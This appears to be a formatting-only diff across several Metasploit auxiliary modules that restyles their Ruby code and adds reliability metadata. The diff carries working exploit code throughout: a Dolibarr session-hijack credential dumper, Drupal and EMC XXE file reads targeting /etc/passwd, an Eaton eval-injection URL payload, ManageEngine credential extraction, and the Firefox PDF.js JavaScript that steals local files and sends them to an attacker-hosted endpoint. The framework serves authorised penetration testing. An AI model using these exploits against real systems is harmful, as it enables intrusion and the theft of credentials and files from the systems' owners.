-        res.body.scan(/name="superadmin" value="\d">(Yes|No)/    ).flatten.first,
+        res.body.scan(/name="login" value="([^"]+)"/).flatten.first,
+        res.body.scan(/name="password" value="([^"]+)"/).flatten.first,
+        res.body.scan(/name="superadmin" value="\d">(Yes|No)/).flatten.first,
        res.body.scan(/name="email" class="flat" value="([^"]+)"/).flatten.first
      ]
      unless record.empty?
@@ -100,8 +109,8 @@ class MetasploitModule < Msf::Auxiliary
  #
  def get_user_id
    res = send_request_cgi({
-      'uri'       => normalize_uri(target_uri.path, 'user/fiche.php'),
-      'cookie'    => @cookie
+      'uri' => normalize_uri(target_uri.path, 'user/fiche.php'),
+      'cookie' => @cookie
    })
    if !res
      print_error("Connection failed")
@@ -119,8 +128,8 @@ class MetasploitModule < Msf::Auxiliary
  #
  def create_cookie(token)
    res = send_request_cgi({
-      'uri'       => normalize_uri(target_uri.path, 'user/fiche.php'),
-      'cookie'    => "DOLSESSID_#{Rex::Text.rand_text_alphanumeric(10)}=#{token}"
+      'uri' => normalize_uri(target_uri.path, 'user/fiche.php'),
+      'cookie' => "DOLSESSID_#{Rex::Text.rand_text_alphanumeric(10)}=#{token}"
    })
    if !res
      print_error("Connection failed")
@@ -136,7 +145,7 @@ class MetasploitModule < Msf::Auxiliary
  # Stolen from modules/auxiliary/scanner/ftp/titanftp_xcrc_traversal.rb
  #
  def progress(current, total)
-    done    = (current.to_f / total.to_f) * 100
+    done = (current.to_f / total.to_f) * 100
    percent = "%3.2f%%" % done.to_f
    vprint_status("Trying to hijack a session - " +
      "%7s done (%d/%d tokens)" % [percent, current, total])
@@ -177,6 +186,7 @@ class MetasploitModule < Msf::Auxiliary

  def run
    return unless tokens = get_session_tokens
+
    credentials = []
    print_status("Trying to hijack a session...")
    tokens.flatten.each_with_index do |token, index|
@@ -191,8 +201,8 @@ class MetasploitModule < Msf::Auxiliary
      return
    end
    cred_table = Rex::Text::Table.new(
-      'Header'  => 'Dolibarr User Credentials',
-      'Indent'  => 1,
+      'Header' => 'Dolibarr User Credentials',
+      'Indent' => 1,
      'Columns' => ['Username', 'Password', 'Admin', 'E-mail']
    )
    credentials.each do |record|
@@ -208,17 +218,18 @@ class MetasploitModule < Msf::Auxiliary
    end
    print_line
    print_line("#{cred_table}")
-    loot_name     = 'dolibarr.traversal.user.credentials'
-    loot_type     = 'text/csv'
+    loot_name = 'dolibarr.traversal.user.credentials'
+    loot_type = 'text/csv'
    loot_filename = 'dolibarr_user_creds.csv'
-    loot_desc     = 'Dolibarr User Credentials'
+    loot_desc = 'Dolibarr User Credentials'
    p = store_loot(
      loot_name,
      loot_type,
      rhost,
      cred_table.to_csv,
      loot_filename,
-      loot_desc)
+      loot_desc
+    )
    print_status("Credentials saved in: #{p}")
  end
 end
@@ -9,23 +9,23 @@ class MetasploitModule < Msf::Auxiliary
  include REXML

  def initialize(info = {})
-    super(update_info(info,
-      'Name'           => 'Drupal OpenID External Entity Injection',
-      'Description'    => %q{
-        This module abuses an XML External Entity Injection
-        vulnerability on the OpenID module from Drupal. The vulnerability exists
-        in the parsing of a malformed XRDS file coming from a malicious OpenID
-        endpoint. This module has been tested successfully on Drupal 7.15 and
-        7.2 with the OpenID module enabled.
-      },
-      'License'        => MSF_LICENSE,
-      'Author'         =>
-        [
+    super(
+      update_info(
+        info,
+        'Name' => 'Drupal OpenID External Entity Injection',
+        'Description' => %q{
+          This module abuses an XML External Entity Injection
+          vulnerability on the OpenID module from Drupal. The vulnerability exists
+          in the parsing of a malformed XRDS file coming from a malicious OpenID
+          endpoint. This module has been tested successfully on Drupal 7.15 and
+          7.2 with the OpenID module enabled.
+        },
+        'License' => MSF_LICENSE,
+        'Author' => [
          'Reginaldo Silva', # Vulnerability discovery
          'juan vazquez' # Metasploit module
        ],
-      'References'     =>
-        [
+        'References' => [
          [ 'CVE', '2012-4554' ],
          [ 'OSVDB', '86429' ],
          [ 'BID', '56103' ],
@@ -33,21 +33,27 @@ class MetasploitModule < Msf::Auxiliary
          [ 'URL', 'https://github.com/drupal/drupal/commit/b9127101ffeca819e74a03fa9f5a48d026c562e5' ],
          [ 'URL', 'https://www.ubercomp.com/posts/2014-01-16_facebook_remote_code_execution' ]
        ],
-      'DisclosureDate' => '2012-10-17'
-    ))
+        'DisclosureDate' => '2012-10-17',
+        'Notes' => {
+          'Reliability' => UNKNOWN_RELIABILITY,
+          'Stability' => UNKNOWN_STABILITY,
+          'SideEffects' => UNKNOWN_SIDE_EFFECTS
+        }
+      )
+    )

    register_options(
      [
        OptString.new('TARGETURI', [ true, "Base Drupal directory path", '/drupal']),
        OptString.new('FILEPATH', [true, "The filepath to read on the server", "/etc/passwd"])
-      ])
-
+      ]
+    )
  end

  def xrds_file
-    element_entity = <<-EOF
-<!ELEMENT URI ANY>
-<!ENTITY xxe SYSTEM "file://#{datastore['FILEPATH']}">
+    element_entity = <<~EOF
+      <!ELEMENT URI ANY>
+      <!ENTITY xxe SYSTEM "file://#{datastore['FILEPATH']}">
    EOF

    xml = Document.new
@@ -57,10 +63,11 @@ class MetasploitModule < Msf::Auxiliary
    xml.add_element(
      "xrds:XRDS",
      {
-        'xmlns:xrds'    => "xri://$xrds",
-        'xmlns'         => "xri://$xrd*($v*2.0)",
+        'xmlns:xrds' => "xri://$xrds",
+        'xmlns' => "xri://$xrd*($v*2.0)",
        'xmlns:openid' => "http://openid.net/xmlns/1.0",
-      })
+      }
+    )

    xrd = xml.root.add_element("XRD")

@@ -150,7 +157,6 @@ class MetasploitModule < Msf::Auxiliary
    service.stop
  end

-
  def on_request_uri(cli, request)
    if request.uri =~ /#{@prefix}/
      vprint_status("Signature found, parsing file...")
@@ -164,7 +170,7 @@ class MetasploitModule < Msf::Auxiliary

  def send_openid_auth(identifier)
    res = send_request_cgi({
-      'uri'    => normalize_uri(target_uri.to_s, "/"),
+      'uri' => normalize_uri(target_uri.to_s, "/"),
      'method' => 'POST',
      'vars_get' => {
        "q" => "node",
@@ -205,6 +211,7 @@ class MetasploitModule < Msf::Auxiliary

  def loot?(data)
    return false if data.blank?
+
    store(data)
    return true
  end
@@ -213,6 +220,7 @@ class MetasploitModule < Msf::Auxiliary
    return false if http_response.blank?
    return false unless http_response.code == 200
    return false unless http_response.body =~ /openid_identifier.*#{signature}/
+
    return true
  end

@@ -220,9 +228,8 @@ class MetasploitModule < Msf::Auxiliary
    return false if http_response.blank?
    return true if http_response.headers['X-Generator'] and http_response.headers['X-Generator'] =~ /Drupal/
    return true if http_response.body and http_response.body.to_s =~ /meta.*Generator.*Drupal/
+
    return false
  end

-
 end
-
@@ -8,45 +8,52 @@ class MetasploitModule < Msf::Auxiliary
  include Msf::Exploit::Remote::HttpClient

  def initialize(info = {})
-    super(update_info(info,
-      'Name'           => 'Network Shutdown Module sort_values Credential Dumper',
-      'Description'    => %q{
-        This module will extract user credentials from Network Shutdown Module
-        versions 3.21 and earlier by exploiting a vulnerability found in
-        lib/dbtools.inc, which uses unsanitized user input inside a eval() call.
-        Please note that in order to extract credentials, the vulnerable service
-        must have at least one USV module (an entry in the "nodes" table in
-        mgedb.db).
-      },
-      'References'     =>
-        [
+    super(
+      update_info(
+        info,
+        'Name' => 'Network Shutdown Module sort_values Credential Dumper',
+        'Description' => %q{
+          This module will extract user credentials from Network Shutdown Module
+          versions 3.21 and earlier by exploiting a vulnerability found in
+          lib/dbtools.inc, which uses unsanitized user input inside a eval() call.
+          Please note that in order to extract credentials, the vulnerable service
+          must have at least one USV module (an entry in the "nodes" table in
+          mgedb.db).
+        },
+        'References' => [
          ['OSVDB', '83199'],
          ['URL', 'https://web.archive.org/web/20121014000855/http://secunia.com/advisories/49103/']
        ],
-      'Author'         =>
-        [
+        'Author' => [
          'h0ng10',
          'sinn3r'
        ],
-      'License'        => MSF_LICENSE,
-      'DisclosureDate' => '2012-06-26'
-    ))
+        'License' => MSF_LICENSE,
+        'DisclosureDate' => '2012-06-26',
+        'Notes' => {
+          'Reliability' => UNKNOWN_RELIABILITY,
+          'Stability' => UNKNOWN_STABILITY,
+          'SideEffects' => UNKNOWN_SIDE_EFFECTS
+        }
+      )
+    )

    register_options(
      [
        Opt::RPORT(4679)
-      ])
+      ]
+    )
  end

  def execute_php_code(code, opts = {})
    param_name = Rex::Text.rand_text_alpha(6)
-    padding    = Rex::Text.rand_text_alpha(6)
-    php_code   = Rex::Text.encode_base64(code)
-    url_param  = "#{padding}%22%5d,%20eval(base64_decode(%24_POST%5b%27#{param_name}%27%5d))%29;%2f%2f"
+    padding = Rex::Text.rand_text_alpha(6)
+    php_code = Rex::Text.encode_base64(code)
+    url_param = "#{padding}%22%5d,%20eval(base64_decode(%24_POST%5b%27#{param_name}%27%5d))%29;%2f%2f"

    res = send_request_cgi(
      {
-        'uri'   =>  '/view_list.php',
+        'uri' => '/view_list.php',
        'method' => 'POST',
        'vars_get' =>
          {
@@ -60,14 +67,15 @@ class MetasploitModule < Msf::Auxiliary
          {
            'Connection' => 'Close'
          }
-        })
+      }
+    )
    res
  end

  def read_credentials
-    pattern   = Rex::Text.rand_text_numeric(10)
+    pattern = Rex::Text.rand_text_numeric(10)
    users_var = Rex::Text.rand_text_alpha(10)
-    user_var  = Rex::Text.rand_text_alpha(10)
+    user_var = Rex::Text.rand_text_alpha(10)
    php = <<-EOT
    $#{users_var} = &queryDB("SELECT * FROM configUsers;");
    foreach($#{users_var} as $#{user_var}) {
@@ -96,8 +104,8 @@ class MetasploitModule < Msf::Auxiliary
    end

    cred_table = Rex::Text::Table.new(
-      'Header'  => 'Network Shutdown Module Credentials',
-      'Indent'  => 1,
+      'Header' => 'Network Shutdown Module Credentials',
+      'Indent' => 1,
      'Columns' => ['Username', 'Password']
    )

@@ -108,10 +116,10 @@ class MetasploitModule < Msf::Auxiliary
    print_line
    print_line(cred_table.to_s)

-    loot_name     = "eaton.nsm.credentials"
-    loot_type     = "text/csv"
+    loot_name = "eaton.nsm.credentials"
+    loot_type = "text/csv"
    loot_filename = "eaton_nsm_creds.csv"
-    loot_desc     = "Eaton Network Shutdown Module Credentials"
+    loot_desc = "Eaton Network Shutdown Module Credentials"
    p = store_loot(loot_name, loot_type, datastore['RHOST'], cred_table.to_csv, loot_filename, loot_desc)
    print_good("Credentials saved in: #{p.to_s}")
  end
@@ -7,25 +7,31 @@ class MetasploitModule < Msf::Auxiliary
  include Msf::Exploit::Remote::HttpClient

  def initialize(info = {})
-    super(update_info(info,
-      'Name'           => 'EMC CTA v10.0 Unauthenticated XXE Arbitrary File Read',
-      'Description'    => %q{
-      EMC CTA v10.0 is susceptible to an unauthenticated XXE attack
-      that allows an attacker to read arbitrary files from the file system
-      with the permissions of the root user.
-      },
-      'License'        => MSF_LICENSE,
-      'Author'         =>
-        [
-          'Brandon Perry <bperry.volatile[at]gmail.com>', #metasploit module
+    super(
+      update_info(
+        info,
+        'Name' => 'EMC CTA v10.0 Unauthenticated XXE Arbitrary File Read',
+        'Description' => %q{
+          EMC CTA v10.0 is susceptible to an unauthenticated XXE attack
+          that allows an attacker to read arbitrary files from the file system
+          with the permissions of the root user.
+        },
+        'License' => MSF_LICENSE,
+        'Author' => [
+          'Brandon Perry <bperry.volatile[at]gmail.com>', # metasploit module
        ],
-      'References'     =>
-        [
+        'References' => [
          ['CVE', '2014-0644'],
          ['EDB', '32623']
        ],
-      'DisclosureDate' => '2014-03-31'
-    ))
+        'DisclosureDate' => '2014-03-31',
+        'Notes' => {
+          'Reliability' => UNKNOWN_RELIABILITY,
+          'Stability' => UNKNOWN_STABILITY,
+          'SideEffects' => UNKNOWN_SIDE_EFFECTS
+        }
+      )
+    )

    register_options(
      [
@@ -38,7 +44,6 @@ class MetasploitModule < Msf::Auxiliary
  end

  def run
-
    doctype = Rex::Text.rand_text_alpha(6)
    element = Rex::Text.rand_text_alpha(6)
    entity = Rex::Text.rand_text_alpha(6)
@@ -3,27 +3,35 @@
 # Current source: https://github.com/rapid7/metasploit-framework
 ##

-
 class MetasploitModule < Msf::Auxiliary
  include Msf::Exploit::Remote::DNS::Enumeration

  def initialize(info = {})
-    super(update_info(info,
-      'Name'           => 'DNS Record Scanner and Enumerator',
-      'Description'    => %q(
-        This module can be used to gather information about a domain from a
-        given DNS server by performing various DNS queries such as zone
-        transfers, reverse lookups, SRV record brute forcing, and other techniques.
-    ),
-      'Author'         => [
-        'Carlos Perez <carlos_perez[at]darkoperator.com>',
-        'Nixawk'
-      ],
-      'License'        => MSF_LICENSE,
-      'References'     => [
-        ['CVE', '1999-0532'],
-        ['OSVDB', '492']
-      ]))
+    super(
+      update_info(
+        info,
+        'Name' => 'DNS Record Scanner and Enumerator',
+        'Description' => %q{
+          This module can be used to gather information about a domain from a
+          given DNS server by performing various DNS queries such as zone
+          transfers, reverse lookups, SRV record brute forcing, and other techniques.
+        },
+        'Author' => [
+          'Carlos Perez <carlos_perez[at]darkoperator.com>',
+          'Nixawk'
+        ],
+        'License' => MSF_LICENSE,
+        'References' => [
+          ['CVE', '1999-0532'],
+          ['OSVDB', '492']
+        ],
+        'Notes' => {
+          'Reliability' => UNKNOWN_RELIABILITY,
+          'Stability' => UNKNOWN_STABILITY,
+          'SideEffects' => UNKNOWN_SIDE_EFFECTS
+        }
+      )
+    )

    register_options(
      [
@@ -43,7 +51,8 @@ class MetasploitModule < Msf::Auxiliary
        OptAddressRange.new('IPRANGE', [false, "The target address range or CIDR identifier"]),
        OptInt.new('THREADS', [false, 'Threads for ENUM_BRT', 1]),
        OptPath.new('WORDLIST', [false, 'Wordlist of subdomains', ::File.join(Msf::Config.data_directory, 'wordlists', 'namelist.txt')])
-      ])
+      ]
+    )

    register_advanced_options(
      [
@@ -51,7 +60,8 @@ class MetasploitModule < Msf::Auxiliary
        OptInt.new('RETRY', [false, 'Number of times to try to resolve a record if no response is received', 2]),
        OptInt.new('RETRY_INTERVAL', [false, 'Number of seconds to wait before doing a retry', 2]),
        OptBool.new('TCP_DNS', [false, 'Run queries over TCP', false])
-      ])
+      ]
+    )
    deregister_options('DnsClientUdpTimeout', 'DnsClientRetry', 'DnsClientRetryInterval', 'DnsClientTcpDns')
  end

@@ -89,6 +99,7 @@ class MetasploitModule < Msf::Auxiliary
    dns_reverse(datastore['IPRANGE'], threads) if datastore['ENUM_RVL']

    return unless datastore['ENUM_BRT']
+
    if is_wildcard
      dns_bruteforce(domain, datastore['WORDLIST'], threads) unless datastore['STOP_WLDCRD']
    else
@@ -10,40 +10,47 @@ class MetasploitModule < Msf::Auxiliary
  include Msf::Auxiliary::Report

  def initialize(info = {})
-    super(update_info(info,
-      'Name' => 'ManageEngine Eventlog Analyzer Managed Hosts Administrator Credential Disclosure',
-      'Description' => %q{
-        ManageEngine Eventlog Analyzer from v7 to v9.9 b9002 has two security vulnerabilities that
-        allow an unauthenticated user to obtain the superuser password of any managed Windows and
-        AS/400 hosts. This module abuses both vulnerabilities to collect all the available
-        usernames and passwords. First the agentHandler servlet is abused to get the hostid and
-        slid of each device (CVE-2014-6038); then these numeric IDs are used to extract usernames
-        and passwords by abusing the hostdetails servlet (CVE-2014-6039). Note that on version 7,
-        the TARGETURI has to be prepended with /event.
-      },
-      'Author' =>
-        [
+    super(
+      update_info(
+        info,
+        'Name' => 'ManageEngine Eventlog Analyzer Managed Hosts Administrator Credential Disclosure',
+        'Description' => %q{
+          ManageEngine Eventlog Analyzer from v7 to v9.9 b9002 has two security vulnerabilities that
+          allow an unauthenticated user to obtain the superuser password of any managed Windows and
+          AS/400 hosts. This module abuses both vulnerabilities to collect all the available
+          usernames and passwords. First the agentHandler servlet is abused to get the hostid and
+          slid of each device (CVE-2014-6038); then these numeric IDs are used to extract usernames
+          and passwords by abusing the hostdetails servlet (CVE-2014-6039). Note that on version 7,
+          the TARGETURI has to be prepended with /event.
+        },
+        'Author' => [
          'Pedro Ribeiro <pedrib[at]gmail.com>' # Vulnerability discovery and MSF module
        ],
-      'License' => MSF_LICENSE,
-      'References' =>
-        [
+        'License' => MSF_LICENSE,
+        'References' => [
          [ 'CVE', '2014-6038' ],
          [ 'CVE', '2014-6039' ],
          [ 'OSVDB', '114342' ],
          [ 'OSVDB', '114344' ],
          [ 'URL', 'https://seclists.org/fulldisclosure/2014/Nov/12' ]
        ],
-      'DisclosureDate' => '2014-11-05'))
+        'DisclosureDate' => '2014-11-05',
+        'Notes' => {
+          'Reliability' => UNKNOWN_RELIABILITY,
+          'Stability' => UNKNOWN_STABILITY,
+          'SideEffects' => UNKNOWN_SIDE_EFFECTS
+        }
+      )
+    )

    register_options(
      [
        Opt::RPORT(8400),
-        OptString.new('TARGETURI', [ true,  'Eventlog Analyzer application URI (should be /event for version 7)', '/']),
-      ])
+        OptString.new('TARGETURI', [ true, 'Eventlog Analyzer application URI (should be /event for version 7)', '/']),
+      ]
+    )
  end

-
  def decode_password(encoded_password)
    password_xor = Rex::Text.decode_base64(encoded_password)
    password = ''
@@ -53,11 +60,10 @@ class MetasploitModule < Msf::Auxiliary
    return password
  end

-
  def run
    res = send_request_cgi({
      'uri' => normalize_uri(target_uri.path, 'agentHandler'),
-      'method' =>'GET',
+      'method' => 'GET',
      'vars_get' => {
        'mode' => 'getTableData',
        'table' => 'HostDetails'
@@ -72,7 +78,7 @@ class MetasploitModule < Msf::Auxiliary
    # When passwords have digits the XML parsing will fail.
    # Replace with an empty password attribute so that we know the device has a password
    # and therefore we want to add it to our host list.
-    xml = res.body.to_s.gsub(/&#[0-9]*;/,Rex::Text.rand_text_alpha(6))
+    xml = res.body.to_s.gsub(/&#[0-9]*;/, Rex::Text.rand_text_alpha(6))
    begin
      doc = REXML::Document.new(xml)
    rescue
@@ -89,8 +95,8 @@ class MetasploitModule < Msf::Auxiliary
    end

    cred_table = Rex::Text::Table.new(
-      'Header'  => 'ManageEngine EventLog Analyzer Managed Devices Credentials',
-      'Indent'  => 1,
+      'Header' => 'ManageEngine EventLog Analyzer Managed Devices Credentials',
+      'Indent' => 1,
      'Columns' =>
        [
          'Host',
@@ -105,7 +111,7 @@ class MetasploitModule < Msf::Auxiliary
    slid_host_ary.each do |host|
      res = send_request_cgi({
        'uri' => normalize_uri(target_uri.path, 'hostdetails'),
-        'method' =>'GET',
+        'method' => 'GET',
        'vars_get' => {
          'slid' => host[0],
          'hostid' => host[1]
@@ -160,9 +166,9 @@ class MetasploitModule < Msf::Auxiliary
          end

          credential_core = report_credential_core({
-             password: password,
-             username: username,
-           })
+            password: password,
+            username: username,
+          })

          host_login_data = {
            address: host_ipaddress,
@@ -180,22 +186,22 @@ class MetasploitModule < Msf::Auxiliary

    print_line
    print_line("#{cred_table}")
-    loot_name     = 'manageengine.eventlog.managed_hosts.creds'
-    loot_type     = 'text/csv'
+    loot_name = 'manageengine.eventlog.managed_hosts.creds'
+    loot_type = 'text/csv'
    loot_filename = 'manageengine_eventlog_managed_hosts_creds.csv'
-    loot_desc     = 'ManageEngine Eventlog Analyzer Managed Hosts Administrator Credentials'
+    loot_desc = 'ManageEngine Eventlog Analyzer Managed Hosts Administrator Credentials'
    p = store_loot(
      loot_name,
      loot_type,
      rhost,
      cred_table.to_csv,
      loot_filename,
-      loot_desc)
+      loot_desc
+    )
    print_status "Credentials saved in: #{p}"
  end

-
-  def report_credential_core(cred_opts={})
+  def report_credential_core(cred_opts = {})
    # Set up the has for our Origin service
    origin_service_data = {
      address: rhost,
@@ -11,19 +11,18 @@ class MetasploitModule < Msf::Auxiliary

  def initialize
    super(
-      'Name'        	=> 'Discover External IP via Ifconfig.me',
+      'Name' => 'Discover External IP via Ifconfig.me',
      'Description'	=> %q{
        This module checks for the public source IP address of the current
        route to the RHOST by querying the public web application at ifconfig.me.
        It should be noted this module will register activity on ifconfig.me,
        which is not affiliated with Metasploit.
      },
-      'Author'        => ['RageLtMan <rageltman[at]sempervictus>'],
+      'Author' => ['RageLtMan <rageltman[at]sempervictus>'],
      'License'	=> MSF_LICENSE,
-      'References'	=>
-        [
-          [ 'URL', 'http://ifconfig.me/ip' ],
-        ],
+      'References' => [
+        [ 'URL', 'http://ifconfig.me/ip' ],
+      ],
      'DefaultOptions' => { 'VHOST' => 'ifconfig.me' }
    )

@@ -31,12 +30,13 @@ class MetasploitModule < Msf::Auxiliary
      [
        Opt::RHOST('ifconfig.me'),
        OptBool.new('REPORT_HOST', [false, 'Add the found IP to the database', false])
-      ])
-end
+      ]
+    )
+  end

  def run
    connect
-    res = send_request_cgi({'uri' => '/ip', 'method' => 'GET' })
+    res = send_request_cgi({ 'uri' => '/ip', 'method' => 'GET' })

    if res.nil?
      print_error("Connection timed out")
@@ -158,7 +158,7 @@ class MetasploitModule < Msf::Auxiliary

    # Reporting found cookie name in database
    unless cookie_name.empty?
-      report_note(host: rhost, type: 'f5_load_balancer_cookie_name', data: {:cookie_name => cookie_name })
+      report_note(host: rhost, type: 'f5_load_balancer_cookie_name', data: { :cookie_name => cookie_name })
      # Reporting found pool name in database
      unless pool_name.empty?
        report_note(host: rhost, type: 'f5_load_balancer_pool_name', data: { :pool_name => pool_name })
@@ -7,34 +7,41 @@ class MetasploitModule < Msf::Auxiliary
  include Msf::Exploit::Remote::HttpServer::HTML
  include Msf::Auxiliary::Report

-  def initialize(info={})
-    super(update_info(info,
-      'Name'        => 'Firefox PDF.js Browser File Theft',
-      'Description' => %q{
-        This module abuses an XSS vulnerability in versions prior to Firefox 39.0.3, Firefox ESR
-        38.1.1, and Firefox OS 2.2 that allows arbitrary files to be stolen. The vulnerability
-        occurs in the PDF.js component, which uses Javascript to render a PDF inside a frame with
-        privileges to read local files. The in-the-wild malicious payloads searched for sensitive
-        files on Windows, Linux, and OSX. Android versions are reported to be unaffected, as they
-        do not use the Mozilla PDF viewer.
-      },
-      'Author'         => [
-        'Unknown', # From an 0day served on Russian news website
-        'fukusa',  # Hacker news member that reported the issue
-        'Unknown'  # Metasploit module
-      ],
-      'License'     => MSF_LICENSE,
-      'Actions'        => [[ 'WebServer', 'Description' => 'Serve exploit via web server' ]],
-      'PassiveActions' => [ 'WebServer' ],
-      'References' =>
-        [
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'Firefox PDF.js Browser File Theft',
+        'Description' => %q{
+          This module abuses an XSS vulnerability in versions prior to Firefox 39.0.3, Firefox ESR
+          38.1.1, and Firefox OS 2.2 that allows arbitrary files to be stolen. The vulnerability
+          occurs in the PDF.js component, which uses Javascript to render a PDF inside a frame with
+          privileges to read local files. The in-the-wild malicious payloads searched for sensitive
+          files on Windows, Linux, and OSX. Android versions are reported to be unaffected, as they
+          do not use the Mozilla PDF viewer.
+        },
+        'Author' => [
+          'Unknown', # From an 0day served on Russian news website
+          'fukusa',  # Hacker news member that reported the issue
+          'Unknown'  # Metasploit module
+        ],
+        'License' => MSF_LICENSE,
+        'Actions' => [[ 'WebServer', 'Description' => 'Serve exploit via web server' ]],
+        'PassiveActions' => [ 'WebServer' ],
+        'References' => [
          ['URL', 'https://paste.debian.net/290146'], # 0day exploit
          ['URL', 'https://news.ycombinator.com/item?id=10021376'], # discussion with discoverer
          ['URL', 'https://blog.mozilla.org/security/2015/08/06/firefox-exploit-found-in-the-wild/'],
          ['CVE', '2015-4495']
        ],
-      'DefaultAction'  => 'WebServer'
-    ))
+        'DefaultAction' => 'WebServer',
+        'Notes' => {
+          'Reliability' => UNKNOWN_RELIABILITY,
+          'Stability' => UNKNOWN_STABILITY,
+          'SideEffects' => UNKNOWN_SIDE_EFFECTS
+        }
+      )
+    )

    register_options([
      OptString.new('FILES', [
@@ -88,12 +95,11 @@ class MetasploitModule < Msf::Auxiliary
    proto = (datastore['SSL'] ? 'https' : 'http')
    my_host = (datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address : datastore['SRVHOST']
    port_str = (datastore['SRVPORT'].to_i == 80) ? '' : ":#{datastore['SRVPORT']}"
-    resource = ('/' == get_resource[-1,1]) ? get_resource[0, get_resource.length-1] : get_resource
+    resource = ('/' == get_resource[-1, 1]) ? get_resource[0, get_resource.length - 1] : get_resource

    "#{proto}://#{my_host}#{port_str}#{resource}/catch"
  end

-
  def file_payload
    %Q|
      var files = (#{JSON.generate(file_urls)});
@@ -118,158 +124,158 @@ class MetasploitModule < Msf::Auxiliary
  end

  def js
-    <<-EOJS
-function xml2string(obj) {
-  return new XMLSerializer().serializeToString(obj);
-}
+    <<~EOJS
+      function xml2string(obj) {
+        return new XMLSerializer().serializeToString(obj);
+      }

-function __proto(obj) {
-  return obj.__proto__.__proto__.__proto__.__proto__.__proto__.__proto__;
-}
+      function __proto(obj) {
+        return obj.__proto__.__proto__.__proto__.__proto__.__proto__.__proto__;
+      }

-function get(path, callback, timeout, template, value) {
-  callback = _(callback);
-  if (template && value) {
-    callback = callback.replace(template, value);
-  }
-  js_call1 = 'javascript:' + _(function() {
-    try {
-      open("%url%", "_self");
-    } catch (e) {
-      history.back();
-    }
-    undefined;
-  }, "%url%", path);
-  js_call2 = 'javascript:;try{updateHidden();}catch(e){};' + callback + ';undefined';
-  sandboxContext(_(function() {
-    i = document.getElementById('i');
-    p = __proto(i.contentDocument.styleSheets[0].ownerNode);
-    i2 = document.getElementById('i2');
-    l = p.__lookupSetter__.call(i2.contentWindow, 'location');
-    l.call(i2.contentWindow, window.wrappedJSObject.js_call1);
-  }));
-  setTimeout((function() {
-    sandboxContext(_(function() {
-      p = __proto(i.contentDocument.styleSheets[0].ownerNode);
-      l = p.__lookupSetter__.call(i2.contentWindow, 'location');
-      l.call(i2.contentWindow, window.wrappedJSObject.js_call2);
-    }));
-  }), timeout);
-}
-
-function get_data(obj) {
-  data = null;
-  try {
-    data = obj.document.documentElement.innerHTML;
-    if (data.indexOf('dirListing') < 0) {
-      throw new Error();
-    }
-  } catch (e) {
-    if (this.document instanceof XMLDocument) {
-        data = xml2string(this.document);
-    } else {
-      try {
-          if (this.document.body.firstChild.nodeName.toUpperCase() == 'PRE') {
-              data = this.document.body.firstChild.textContent;
-          } else {
-              throw new Error();
+      function get(path, callback, timeout, template, value) {
+        callback = _(callback);
+        if (template && value) {
+          callback = callback.replace(template, value);
+        }
+        js_call1 = 'javascript:' + _(function() {
+          try {
+            open("%url%", "_self");
+          } catch (e) {
+            history.back();
          }
-      } catch (e) {
+          undefined;
+        }, "%url%", path);
+        js_call2 = 'javascript:;try{updateHidden();}catch(e){};' + callback + ';undefined';
+        sandboxContext(_(function() {
+          i = document.getElementById('i');
+          p = __proto(i.contentDocument.styleSheets[0].ownerNode);
+          i2 = document.getElementById('i2');
+          l = p.__lookupSetter__.call(i2.contentWindow, 'location');
+          l.call(i2.contentWindow, window.wrappedJSObject.js_call1);
+        }));
+        setTimeout((function() {
+          sandboxContext(_(function() {
+            p = __proto(i.contentDocument.styleSheets[0].ownerNode);
+            l = p.__lookupSetter__.call(i2.contentWindow, 'location');
+            l.call(i2.contentWindow, window.wrappedJSObject.js_call2);
+          }));
+        }), timeout);
+      }
+
+      function get_data(obj) {
+        data = null;
        try {
-          if (this.document.body.baseURI.indexOf('pdf.js') >= 0 || data.indexOf('aboutNetError') > -1) {;
-              return null;
-          } else {
-              throw new Error();
+          data = obj.document.documentElement.innerHTML;
+          if (data.indexOf('dirListing') < 0) {
+            throw new Error();
          }
        } catch (e) {
-          ;;
+          if (this.document instanceof XMLDocument) {
+              data = xml2string(this.document);
+          } else {
+            try {
+                if (this.document.body.firstChild.nodeName.toUpperCase() == 'PRE') {
+                    data = this.document.body.firstChild.textContent;
+                } else {
+                    throw new Error();
+                }
+            } catch (e) {
+              try {
+                if (this.document.body.baseURI.indexOf('pdf.js') >= 0 || data.indexOf('aboutNetError') > -1) {;
+                    return null;
+                } else {
+                    throw new Error();
+                }
+              } catch (e) {
+                ;;
+              }
+            }
+          }
+        }
+        return data;
+      }
+
+      function _(s, template, value) {
+        s = s.toString().split(/^\\s*function\\s+\\(\\s*\\)\\s*\\{/)[1];
+        s = s.substring(0, s.length - 1);
+        if (template && value) {
+          s = s.replace(template, value);
+        }
+        s += __proto;
+        s += xml2string;
+        s += get_data;
+        s = s.replace(/\\s\\/\\/.*\\n/g, "");
+        s = s + ";undefined";
+        return s;
+      }
+
+      function get_sandbox_context() {
+        if (window.my_win_id == null) {
+          for (var i = 0; i < 20; i++) {
+            try {
+              if (window[i].location.toString().indexOf("view-source:") != -1) {
+                my_win_id = i;
+                break;
+              }
+            } catch (e) {}
+          }
+        };
+        if (window.my_win_id == null)
+          return;
+        clearInterval(sandbox_context_i);
+        object.data = 'view-source:' + blobURL;
+        window[my_win_id].location = 'data:application/x-moz-playpreview-pdfjs;,';
+        object.data = 'data:text/html,<'+'html/>';
+        window[my_win_id].frameElement.insertAdjacentHTML('beforebegin', '<iframe style='+
+          '"position:absolute; left:-9999px;" onload = "'+_(function(){
+          window.wrappedJSObject.sandboxContext=(function(cmd) {
+            with(importFunction.constructor('return this')()) {
+              return eval(cmd);
+            }
+          });
+        }) + '"/>');
+      }
+
+
+      var i = document.createElement("iframe");
+      i.id = "i";
+      i.width=i.height=0;
+      i.style='position:absolute;left:-9999px;';
+      i.src = "data:application/xml,<?xml version=\\"1.0\\"?><e><e1></e1></e>";
+      document.documentElement.appendChild(i);
+      i.onload = function() {
+        if (this.contentDocument.styleSheets.length > 0) {
+          var i2 = document.createElement("iframe");
+          i2.id = "i2";
+          i2.width=i2.height=0;
+          i2.style='position:absolute;left:-9999px;';
+          i2.src = "data:application/pdf,";
+          document.documentElement.appendChild(i2);
+          pdfBlob = new Blob([''], {
+              type: 'application/pdf'
+          });
+          blobURL = URL.createObjectURL(pdfBlob);
+          object = document.createElement('object');
+          object.data = 'data:application/pdf,';
+          object.onload = (function() {
+              sandbox_context_i = setInterval(get_sandbox_context, 200);
+              object.onload = null;
+              object.data = 'view-source:' + location.href;
+              return;
+          });
